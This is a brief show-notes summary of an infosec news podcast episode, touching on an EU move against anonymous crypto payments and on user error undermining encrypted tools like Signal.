Legislative Impacts on Privacy: EU's attempt to ban anonymous crypto payments raises questions about balancing security with individual financial privacy and freedoms.
User Error vs. Security Tools: While tools like Signal offer robust encryption, user errors can still lead to significant security breaches, highlighting the importance of comprehensive security policies and user training.
This episode of "Talkin' About [Infosec] News" covers the week's infosec incidents with an emphasis on proactive defenses, transparent incident handling, and the practical limits of the tools and laws meant to help. The team's dialogue, mixing humor with hands-on advice, offers takeaways for both seasoned professionals and newcomers to the field.